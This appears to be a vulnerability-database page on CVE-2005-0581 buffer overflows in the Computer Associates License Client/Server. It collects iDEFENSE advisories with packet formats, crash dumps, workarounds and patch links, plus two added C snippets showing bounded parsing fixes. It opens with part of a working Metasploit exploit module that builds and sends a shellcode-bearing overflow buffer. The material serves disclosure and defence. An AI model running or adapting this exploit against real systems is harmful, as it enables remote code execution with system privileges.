	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	my $server = IO::Socket::INET->new
	  (
		'LocalPort' => 10202,
		'Proto'     => 'tcp',
		'ReuseAddr' => 1,
		'Listen'    => 5,
		'Blocking'  => 0,
	  );

	if (! $server) {
		$self->PrintLine("[*] Could not start the fake CA License Server: $!");
		return;
	}
	my $sel = IO::Select->new($server);

	# 1: Connect to the agent and send a request
	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError) {
		$self->PrintLine("[*] Could not connect to the client agent");
		$server->shutdown(2);
		$server->close;
		return;
	}

	$s->Send("A0 GETSERVER<EOM>\n");
	$self->PrintLine("[*] Waiting for the license agent to connect back...");

	my $r = $s->Recv(-1, 3);

	# 2: Wait for a connection from the agent back to us
	my @ready = $sel->can_read(8);
	if (! scalar(@ready)) {
		$self->PrintLine("[*] No connection was received from the agent >:(");
		$s->Close;
		$server->shutdown(2);
		$server->close;
		return;
	}

	# 3: Accept the connection and determine target type if needed
	my $agent_soc = $ready[0]->accept();
	my $agent = Msf::Socket::Tcp->new_from_socket($agent_soc);
	$self->PrintLine("[*] Accepted connection from agent ".$agent->PeerAddr);

	if ($target_idx == 0) {

		$agent->Send("A0 GETCONFIG SELF 0<EOM>");
		my $data = $agent->Recv(-1, 2);

		if ($data =~ m/OS\<([^\>]+)/) {
			my $os = $1;
			$os =~ s/_NT//g;
			$os =~ s/5\.1/XP/;
			$os =~ s/5\.2/2003/;
			$os =~ s/5\.0/2000/;
			$os =~ s/4\.0/NT 4.0/;

			my @targs;
			for (1 .. (scalar(@{$self->Targets})-1)) {
				if (index($self->Targets->[$_]->[0], $os) != -1) {
					push @targs, $_;
				}
			}

			if (scalar(@targs) > 1) {
				$self->PrintLine("[*] Multiple possible targets:");
				foreach (@targs) {
					$self->PrintLine("[*]  $_\t".$self->Targets->[$_]->[0]);
				}
				$self->PrintLine("[*] Picking the closest target and hoping...");
				return;
			}

			if (scalar(@targs)) {
				$target = $self->Targets->[$targs[0]];
			}

			if (! scalar(@targs)) {
				$self->PrintLine("[*] No matching target for $os");
				return;
			}

		} else {
			$self->PrintLine("[*] Could not determine the remote OS automatically");
			return;
		}
	}

	$self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

	my $boom = Pex::Text::EnglishText(900);

	# 144 -> original return address
	# 148 -> avoid exception by patching with writable address
	# 928 -> seh handler (not useful under XP SP2)

	substr($boom, 144, 4, pack('V', $target->[1]));     # jmp esi
	substr($boom, 148, 4, pack('V', $target->[2]));     # writable address
	substr($boom, 272, length($shellcode), $shellcode);

	my $req = "A0 GETCONFIG SELF $boom<EOM>";

	$self->PrintLine("[*] Sending " .length($req) . " bytes to remote host.");
	$agent->Send($req);

	$server->shutdown(2);
	$agent->Close;
	$s->Close;

	return;
}

1;
    

- Vulnerability information (F36434)

iDEFENSE Security Advisory 2005-03-02.6 (PacketStormID:F36434)
2005-03-03 00:00:00
iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary,local
CVE-2005-0581

iDEFENSE Security Advisory 03.02.05 - Remote exploitation of a buffer overflow vulnerability in Computer Associates License Server and License Client can allow attackers to execute arbitrary code. The vulnerability specifically exists due to insufficient bounds checking on user-supplied values in GCR requests. Exploitation allows remote attackers to execute arbitrary code under the privileges of Local System.

Computer Associates License Client/Server GCR Checksum Buffer Overflow 

iDEFENSE Security Advisory 03.02.05
www.idefense.com/application/poi/display?id=215&type=vulnerabilities
March 2, 2005

I. BACKGROUND

The Computer Associates License Client/Server applications provide a 
method for CA products to register their licenses on the network. The 
License Client and Server are distributed with almost all CA software 
distributions. More information about Computer Associates software 
products is available from:

   http://www3.ca.com/Products/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Computer 
Associates License Server and License Client can allow attackers to 
execute arbitrary code.

The vulnerability specifically exists due to insufficient bounds 
checking on user-supplied values in GCR requests. The GCR request 
packet format is shown below:

A0 GCR HOSTNAME<DEVBOX>HARDWARE<001122334455>LOCALE<English>
IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>
OS<Windows_NT 5.0>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>
NETWORK<127.0.0.1 HOSTNAME 255.255.255.0>MACHINE<PC_1586_1_3201>
CHECKSUMS<1 2 3 4 5 6 7 8 9 10 11 12>RMTV<1.00><EOM>

If the second, fifth, eighth, or eleventh field of the Checksums item 
contains a large string, a stack overflow will occur. The format 
specifier for the call to sscanf() is simply:

"%x %s %i %x %s %i %x %s %i %x %s %i"

If the eleventh field is used to overflow the local stack buffer, the 
return address will be overwritten with the address at 64 bytes into 
the overflow string.
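The pattern just described, as an added example that is not code from the advisory or from Computer Associates: the vulnerable call with the format string quoted above, beside a bounded version that rejects over-long fields instead of truncating them. The 63-character slot size and the struct and function names are assumptions made here; the benign CHECKSUMS value is the one from the advisory's sample packet, the over-long one is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the advisory's or CA's code. The format string is
 * the one quoted in the advisory; the slot size (63 characters plus the
 * terminating NUL) is an assumption made here for illustration, since
 * the advisory does not give the real buffer size. */
#define CHK_STR_MAX 63
#define STR_(x) #x
#define STR(x) STR_(x)

struct checksums {
    unsigned int hex[4];             /* the %x fields (1, 4, 7, 10) */
    char str[4][CHK_STR_MAX + 1];    /* the %s fields (2, 5, 8, 11) */
    int num[4];                      /* the %i fields (3, 6, 9, 12) */
};

/* Vulnerable pattern: "%s" without a width copies until whitespace, so a
 * long second, fifth, eighth or eleventh field runs past str[n] on the
 * stack. Kept only as the shape to recognise in a code review; this
 * example never feeds it over-long input. */
int parse_checksums_unbounded(const char *value, struct checksums *c)
{
    return sscanf(value, "%x %s %i %x %s %i %x %s %i %x %s %i",
                  &c->hex[0], c->str[0], &c->num[0],
                  &c->hex[1], c->str[1], &c->num[1],
                  &c->hex[2], c->str[2], &c->num[2],
                  &c->hex[3], c->str[3], &c->num[3]) == 12;
}

/* Bounded version. Every "%s" carries a width tied to the slot size, and
 * each token is length-checked before the call. The pre-check matters:
 * a width-limited "%s" truncates silently, and the tail of the token
 * would then be mis-read as the next field instead of the input being
 * rejected. */
int parse_checksums_bounded(const char *value, struct checksums *c)
{
    const char *p = value;
    int tokens = 0;

    while (*p != '\0') {
        while (*p == ' ') p++;
        if (*p == '\0') break;
        size_t len = strcspn(p, " ");
        if (len > CHK_STR_MAX) return 0;   /* reject, do not truncate */
        tokens++;
        p += len;
    }
    if (tokens != 12) return 0;

    return sscanf(value,
                  "%x %" STR(CHK_STR_MAX) "s %i "
                  "%x %" STR(CHK_STR_MAX) "s %i "
                  "%x %" STR(CHK_STR_MAX) "s %i "
                  "%x %" STR(CHK_STR_MAX) "s %i",
                  &c->hex[0], c->str[0], &c->num[0],
                  &c->hex[1], c->str[1], &c->num[1],
                  &c->hex[2], c->str[2], &c->num[2],
                  &c->hex[3], c->str[3], &c->num[3]) == 12;
}

/* Constructed inputs: the CHECKSUMS value from the advisory's sample
 * packet, and one whose eleventh field is 200 characters long. */
int demo_bounded_accepts_sample(void)
{
    struct checksums c;
    if (!parse_checksums_bounded("1 2 3 4 5 6 7 8 9 10 11 12", &c)) return 0;
    /* field 10 is read by %x, so "10" becomes 16; field 11 is a string */
    return c.hex[3] == 16 && strcmp(c.str[3], "11") == 0 && c.num[3] == 12;
}

int demo_bounded_rejects_long_eleventh(void)
{
    char value[300];
    char big[201];
    struct checksums c;
    memset(big, 'X', 200);
    big[200] = '\0';
    snprintf(value, sizeof value, "1 2 3 4 5 6 7 8 9 10 %s 12", big);
    return parse_checksums_bounded(value, &c);   /* 0: rejected */
}
```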

Ollydbg output after SEH overwrite in CA License Client:

EAX 00630510
ECX 7C91056D ntdll.7C91056D
EDX 003B0000
EBX 00D4E053 ASCII "GCR"
ESP 0082FC10 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EBP 00D4E050 ASCII "A0"
ESI 0082FCBC ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
EDI 00D4E057 ASCII "HOSTNAME<DEVBOX>HARDWARE<0011
EIP DEADC0DE

Log data, item 0
Address=DEADC0DE
Message=Access violation when executing [DEADC0DE]

III. ANALYSIS

Exploitation allows remote attackers to execute arbitrary code under 
the privileges of Local System. A GETCONFIG packet exchange which 
discloses the remote operating system version usually precedes the GCR 
request and increases the likelihood of successful exploitation. The CA 
License Server does not run by default, but is packaged with most 
Computer Associates software distributions. The CA License Client does 
run by default and is packaged with almost all Computer Associates 
software.

IV. DETECTION

iDEFENSE has confirmed that CA License Server 0.1.0.15 and CA License 
Client 0.1.0.15 are vulnerable. 

V. WORKAROUND

Use a firewall to only allow trusted hosts to connect to the Computer 
Associates License Server and Client ports. 

VI. VENDOR RESPONSE

A vendor advisory for this issue is available at:

http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp

Patches for this issue are available at:

http://supportconnectw.ca.com/public/reglic/downloads/licensepatch.asp#alp

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-0581 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems. This is one of several overflows that have been
assigned CAN-2005-0581.

VIII. DISCLOSURE TIMELINE

12/01/2004  Initial vendor notification
12/01/2004  Initial vendor response
03/02/2005  Coordinated public disclosure

IX. CREDIT

An anonymous contributor is credited with discovering this 
vulnerability.

Get paid for vulnerability research 
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert 
electronically. It may not be edited in any way without the express 
written consent of iDEFENSE. If you wish to reprint the whole or any 
part of this alert in any other medium other than electronically, 
please email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate 
at the time of publishing based on currently available information. Use 
of the information constitutes acceptance for use in an AS IS 
condition. There are no warranties with regard to this information. 
Neither the author nor the publisher accepts any liability for any 
direct, indirect, or consequential loss or damage arising from use of, 
or reliance on, this information.

    

- Vulnerability information (F36433)

iDEFENSE Security Advisory 2005-03-02.5 (PacketStormID:F36433)
2005-03-03 00:00:00
iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary
CVE-2005-0581

iDEFENSE Security Advisory 03.02.05 - Remote exploitation of a buffer overflow vulnerability in Computer Associates License Server and License Client can allow attackers to execute arbitrary code. The vulnerability specifically exists due to insufficient bounds checking on user-supplied values in GCR requests.

Computer Associates License Client/Server GCR Network Buffer Overflow 

iDEFENSE Security Advisory 03.02.05
www.idefense.com/application/poi/display?id=214&type=vulnerabilities
March 2, 2005

I. BACKGROUND

The Computer Associates License Client/Server applications provide a 
method for CA products to register their licenses on the network. The 
License Client and Server are distributed with almost all CA software 
distributions. More information about Computer Associates software 
products is available from:

   http://www3.ca.com/Products/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Computer 
Associates License Server and License Client can allow attackers to 
execute arbitrary code.

The vulnerability specifically exists due to insufficient bounds 
checking on user-supplied values in GCR requests. The GCR request 
packet format is shown below:

A0 GCR HOSTNAME<DEVBOX>HARDWARE<001122334455>LOCALE<English> 
IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown> 
OS<Windows_NT 5.0>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0> 
NETWORK<127.0.0.1 HOSTNAME 255.255.255.0>MACHINE<PC_1586_1_3201> 
CHECKSUMS<1 2 3 4 5 6 7 8 9 10 11 12>RMTV<1.00><EOM>

If the IP address, hostname, or netmask contain large values, the stack 
overflow can be triggered.

Ollydbg output after SEH overwrite in CA License Server:

EAX 00630210 
ECX 7C91056D ntdll.7C91056D 
EDX 003B0608 
EBX 00E4E053 ASCII "GCR" 
ESP 00E2FC7C ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
EBP 00E4E050 ASCII "A0" 
ESI 00E2FD28 ASCII "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX 
EDI 00E4E057 ASCII "HOSTNAME<DEVBOX>HARDWARE<0011 
EIP DEADC0DE

SEH chain of thread 00000DA4, item 0 
Address=00E2FFA4 
SE handler=58585858

Log data, item 0 
Address=DEADC0DE 
Message=Access violation when executing [DEADC0DE]

III. ANALYSIS

Exploitation allows remote attackers to execute arbitrary code under 
the privileges of Local System. A GETCONFIG packet exchange which 
discloses the remote operating system version usually precedes the GCR 
request and increases the likelihood of successful exploitation. The CA 
License Server does not run by default, but is packaged with most 
Computer Associates software distributions. The CA License Client does 
run by default and is packaged with almost all Computer Associates 
software.

IV. DETECTION

iDEFENSE has confirmed that CA License Server 0.1.0.15 and CA License 
Client 0.1.0.15 are vulnerable. 

V. WORKAROUND

Use a firewall to only allow trusted hosts to connect to the Computer 
Associates License Server and Client ports. 

VI. VENDOR RESPONSE

A vendor advisory for this issue is available at:

http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp

Patches for this issue are available at:

http://supportconnectw.ca.com/public/reglic/downloads/licensepatch.asp#alp

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-0581 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems. This is one of several overflows that have been
assigned CAN-2005-0581.

VIII. DISCLOSURE TIMELINE

12/01/2004  Initial vendor notification
12/01/2004  Initial vendor response
03/02/2005  Coordinated public disclosure

IX. CREDIT

An anonymous contributor is credited with discovering this 
vulnerability.


    

- Vulnerability information (F36432)

iDEFENSE Security Advisory 2005-03-02.4 (PacketStormID:F36432)
2005-03-03 00:00:00
iDefense Labs  idefense.com
advisory,remote,overflow,arbitrary
CVE-2005-0581

iDEFENSE Security Advisory 03.02.05 - Remote exploitation of a buffer overflow vulnerability in Computer Associates License Server and License Client can allow attackers to execute arbitrary code. The vulnerability specifically exists due to insufficient bounds checking on user-supplied values in GETCONFIG requests.

Computer Associates License Client/Server GETCONFIG Buffer Overflow 

iDEFENSE Security Advisory 03.02.05
www.idefense.com/application/poi/display?id=213&type=vulnerabilities
March 2, 2005

I. BACKGROUND

The Computer Associates License Client/Server applications provide a 
method for CA products to register their licenses on the network. The 
License Client and Server are distributed with almost all CA software 
distributions. More information about Computer Associates software 
products is available from:

   http://www3.ca.com/Products/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Computer 
Associates License Server and License Client can allow attackers to 
execute arbitrary code.

The vulnerability specifically exists due to insufficient bounds 
checking on user-supplied values in GETCONFIG requests. Under normal 
operation, the License Server will send a GETCONFIG request to 
connecting clients and clients may optionally respond with a similar 
GETCONFIG packet. Both the client and server software fail to check 
bounds on the last parameter of the GETCONFIG packet which results in a 
stack overflow as shown below. 

Ollydbg output after SEH overwrite in CA License Server:

EAX 00000001
ECX 7C90FB71 ntdll.7C90FB71
EDX 0000000D
EBX 00E4E053 ASCII "GETCONFIG"
ESP 00E2FC9C
EBP 00E4E050 ASCII "A0"
ESI 00E2FD18
EDI 00E4E05D ASCII "SELF"
EIP DEADC0DE

Log data, item 0
Address=DEADC0DE
Message=Access violation when executing [DEADC0DE]

III. ANALYSIS

Exploitation allows remote attackers to execute arbitrary code under 
the privileges of Local System. The GETCONFIG packet also contains the 
remote operating system's version information, which increases the 
likelihood of successful exploitation. The CA License Server does not 
run by default, but is packaged with most Computer Associates software 
distributions. The CA License Client does run by default and is 
packaged with almost all Computer Associates software.

IV. DETECTION

iDEFENSE has confirmed that CA License Server 0.1.0.15 and CA License 
Client 0.1.0.15 are vulnerable. 

V. WORKAROUND

Use a firewall to only allow trusted hosts to connect to the Computer 
Associates License Server and Client ports. 

VI. VENDOR RESPONSE

A vendor advisory for this issue is available at:

http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp

Patches for this issue are available at:

http://supportconnectw.ca.com/public/reglic/downloads/licensepatch.asp#alp

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-0581 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems. This is one of several overflows that have been
assigned CAN-2005-0581.

VIII. DISCLOSURE TIMELINE

12/01/2004  Initial vendor notification
12/01/2004  Initial vendor response
03/02/2005  Coordinated public disclosure

IX. CREDIT

An anonymous contributor is credited with discovering this 
vulnerability.


- Vulnerability information (F36429)

iDEFENSE Security Advisory 2005-03-02.1 (PacketStormID:F36429)
2005-03-03 00:00:00
iDefense Labs,Greg MacManus  idefense.com
advisory,remote,overflow,arbitrary
CVE-2005-0581

iDEFENSE Security Advisory 03.02.05 - Remote exploitation of a buffer overflow vulnerability in Computer Associates International Inc. License Server and License Client can allow attackers to execute arbitrary code. iDEFENSE has confirmed that CA License Server 0.1.0.15 and CA License Client 0.1.0.15 are vulnerable. It is suspected that most CA products are running vulnerable versions of the client and/or server.

Computer Associates License Client and Server Invalid Command Buffer Overflow

iDEFENSE Security Advisory 03.02.05
www.idefense.com/application/poi/display?id=210&type=vulnerabilities
March 2, 2005

I. BACKGROUND

The Computer Associates License Client/Server applications provide a 
method for CA products to register their licenses on the network. The 
License Client and Server are distributed with almost all CA software 
distributions. More information about Computer Associates software 
products is available from:

   http://www3.ca.com/Products/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Computer 
Associates International Inc. License Server and License Client can 
allow attackers to execute arbitrary code.

The vulnerability specifically exists because of insufficient bounds 
checking on user-supplied values in requests with an invalid format. 
When a packet containing an overly long string which is not a valid 
command is received, the server uses that string to generate a log 
message without checking if the buffer that the message is being stored
in is large enough. By sending a string over 2100 bytes long, it is
possible to overwrite the saved instruction pointer, allowing execution
of arbitrary code.
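The GETCONFIG last-parameter overflow in the previous advisory and the invalid-command log overflow described here share one root cause: the length of an attacker-controlled string decides how many bytes get written into a fixed stack buffer. The following is an added illustration of the bounded handling a fix needs, not CA's code; the command token limit and log buffer size are assumed.

```c
/* Added illustration, not CA's code: bounded handling of an
 * unrecognised command token. Sizes are assumed for the example. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define CMD_MAX_LEN  64    /* assumed longest legitimate command token */
#define LOG_LINE_MAX 256   /* assumed fixed-size log buffer */

/* First line of defence: reject the request before anything is copied. */
bool command_length_ok(const char *cmd, size_t cmd_len)
{
    return cmd != NULL && cmd_len > 0 && cmd_len <= CMD_MAX_LEN;
}

/* Second line of defence: even when logging a bad token, never let its
 * length decide how many bytes are written. The %.*s precision caps how
 * much of cmd is read (cmd need not be NUL-terminated) and snprintf caps
 * how much is written and always NUL-terminates. Returns true when the
 * token had to be cut down to fit. */
bool log_unknown_command(char *line, size_t line_len,
                         const char *cmd, size_t cmd_len)
{
    bool cut = cmd_len > CMD_MAX_LEN;
    int prec = cut ? CMD_MAX_LEN : (int)cmd_len;
    int n = snprintf(line, line_len, "unknown command: %.*s%s",
                     prec, cmd, cut ? "...(truncated)" : "");
    return cut || n < 0 || (size_t)n >= line_len;
}

int main(void)
{
    /* Constructed input modelled on the advisory: a 2200-byte token,
     * longer than the 2100 bytes it says reached the saved return address. */
    static char oversized[2200];
    char line[LOG_LINE_MAX];
    memset(oversized, 'A', sizeof oversized);

    bool cut = log_unknown_command(line, sizeof line,
                                   oversized, sizeof oversized);
    printf("accepted=%d truncated=%d strlen(line)=%zu\n",
           command_length_ok(oversized, sizeof oversized),
           cut, strlen(line));
    return 0;
}
```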

III. ANALYSIS

Exploitation allows remote attackers to execute arbitrary code under the
privileges of Local System (on Windows platforms) or root (on Linux 
platforms). The CA License Server does not run by default, but is 
packaged with most Computer Associates software distributions. The CA 
License Client does run by default and is packaged with almost all CA 
software.

IV. DETECTION

iDEFENSE has confirmed that CA License Server 0.1.0.15 and CA License 
Client 0.1.0.15 are vulnerable. It is suspected that most CA products 
are running vulnerable versions of the client and/or server.

V. WORKAROUND

Use a firewall to only allow trusted hosts to connect to the Computer 
Associates License Server and Client ports.

VI. VENDOR RESPONSE

A vendor advisory for this issue is available at:

http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp

Patches for this issue are available at:

http://supportconnectw.ca.com/public/reglic/downloads/licensepatch.asp#alp

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-0581 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems. This is one of several overflows that have been
assigned CAN-2005-0581.

VIII. DISCLOSURE TIMELINE

02/08/2005  Initial vendor notification
02/09/2005  Initial vendor response
03/02/2005  Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by Greg MacManus, iDEFENSE Labs.


- Vulnerability information

ID: 14320
Title: CA License Server/Client GCR Checksum Multiple Overflow
Location: Remote / Network Access
Attack type: Input Manipulation
Impact: Loss of Integrity
Exploit / disclosure: Exploit Commercial, Vendor Verified

- Vulnerability description

A remote overflow exists in License Manager. The program fails to validate GCR Checksum packets resulting in a stack overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-03-02 2004-12-01
Unknown 2005-03-02

- Solution

Upgrade to version CA License 1.61.9 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Title: Computer Associates License Application Multiple Vulnerabilities
Class: Unknown
Bugtraq ID: 12705
Remote: Yes
Local: No
Published: 2005-03-02 12:00:00
Updated: 2009-07-12 10:56:00
Credit: Greg MacManus discovered the directory traversal and some of the buffer overflow vulnerabilities. Discovery of several of the memory corruption issues is credited to Barnaby Jack. An anonymous researcher is credited with the discovery of the other issues.

- Affected program versions

Computer Associates License 1.61.8
Computer Associates License 1.61.2
Computer Associates License 1.61.1
Computer Associates License 1.61
Computer Associates License 1.60.3
Computer Associates License 1.60.2
Computer Associates License 1.60
Computer Associates License 1.57
Computer Associates License 1.56
Computer Associates License 1.55
Computer Associates License 1.54
Computer Associates License 1.53
Computer Associates License 1.0.15
Computer Associates License 1.61.9

- Unaffected program versions

Computer Associates License 1.61.9

- Vulnerability discussion

Computer Associates License client and server applications are reported prone to multiple vulnerabilities. These issues include various buffer overflow vulnerabilities in the client and server and a directory traversal vulnerability in the client. A remote attacker may execute arbitrary code and place files in arbitrary locations on a vulnerable computer.

It should be noted that the affected application runs with SYSTEM privileges on Microsoft Windows Platforms and superuser privileges on UNIX platforms; this will allow for a complete compromise of the affected computer.

**Update: Additional vulnerabilities are reported to affect the 'LIC98RMT.EXE' component of the Computer Associates License application.

Computer Associates License application versions 1.53 to 1.61.8 on all supported platforms are affected by these vulnerabilities.

- Exploitation

The directory traversal vulnerability does not require an exploit.

Two exploits (calicserv_getconfig.pm and calicclnt_getconfig.pm) as part of the Metasploit Framework have been released. These exploits target the GETCONFIG request buffer overflow vulnerability in the client and server.

The exploit 'CALicenseBOExplClass101.cpp' has been released for the buffer overflow in the client application.

- Solution

The vendor has released License version 1.61.9 to address these issues on supported platforms. Customers may follow the instructions provided at the following location to determine if they are using an affected version:

http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp

It should be noted that users that had previously implemented any of the affected Computer Associates applications, including evaluation versions, may be vulnerable as well. It is recommended that such users implement eEye's free vulnerability scanner to verify if they are vulnerable. The scanner can be found at the following URI:

http://www.eeye.com/html/resources/downloads/audits/index.html
- References
